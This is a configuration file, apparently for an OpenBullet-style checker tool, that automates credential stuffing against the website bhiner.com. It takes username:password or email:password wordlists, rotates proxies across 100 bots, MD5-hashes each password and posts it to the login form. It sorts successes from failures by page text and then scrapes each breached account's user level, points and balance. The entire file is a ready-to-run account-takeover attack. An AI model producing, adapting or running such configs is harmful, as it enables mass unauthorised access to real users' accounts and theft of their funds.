[SETTINGS]
{
  "Name": "Bhiner",
  "SuggestedBots": 100,
  "LastModified": "2018-07-06T13:09:46.5140581+00:00",
  "AdditionalInfo": "",
  "Author": "MaStErChO",
  "Version": "1.0.0",
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "UserPass",
  "AllowedWordlist2": "MailPass",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
#Getting_Cookies REQUEST GET "https://www.bhiner.com/" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: text/html, application/xhtml+xml, application/xml;q=0.9, image/webp, image/apng, */*;q=0.8" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
FUNCTION Hash MD5 "<PASS>" -> VAR "PASSS" 
#Checking_Login REQUEST POST "https://www.bhiner.com/login" AutoRedirect=TRUE 
  CONTENT "mode=loginGo&account=<USER>&end_password=<PASSS>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: text/html, application/xhtml+xml, application/xml;q=0.9, image/webp, image/apng, */*;q=0.8" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "referer: https://www.bhiner.com/login" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=FALSE 
  KEYCHAIN Success OR 
    KEY "logout" 
  KEYCHAIN Failure OR 
    KEY "Incorrect Username / Password" 
#Capture REQUEST GET "https://www.bhiner.com/myaccount" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: text/html, application/xhtml+xml, application/xml;q=0.9, image/webp, image/apng, */*;q=0.8" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
#KEY_CHECK_1 KEYCHECK BanOn4XX=FALSE BanOnToCheck=FALSE 
  KEYCHAIN Failure OR 
    KEY "Incorrect Username / Password" 
#LEVEL PARSE "<SOURCE>" REGEX "data-level=\\"([^\\"]*)" "[1]" Recursive=FALSE -> CAP "User Level" "" "" 
#POINTS PARSE "<SOURCE>" REGEX "<i class=\\"mdi mdi-cash mr\\"><\/i>([^<]*)" "[1]" Recursive=FALSE -> CAP "Points" "" "" 
#BALANCE PARSE "<SOURCE>" REGEX ">([^<]*)<\/span>\s*<\/div>\s*<div class=\\"currency-holder\\">([^<]*)" "[1] [2]" Recursive=FALSE -> CAP "Balance" "" "" 
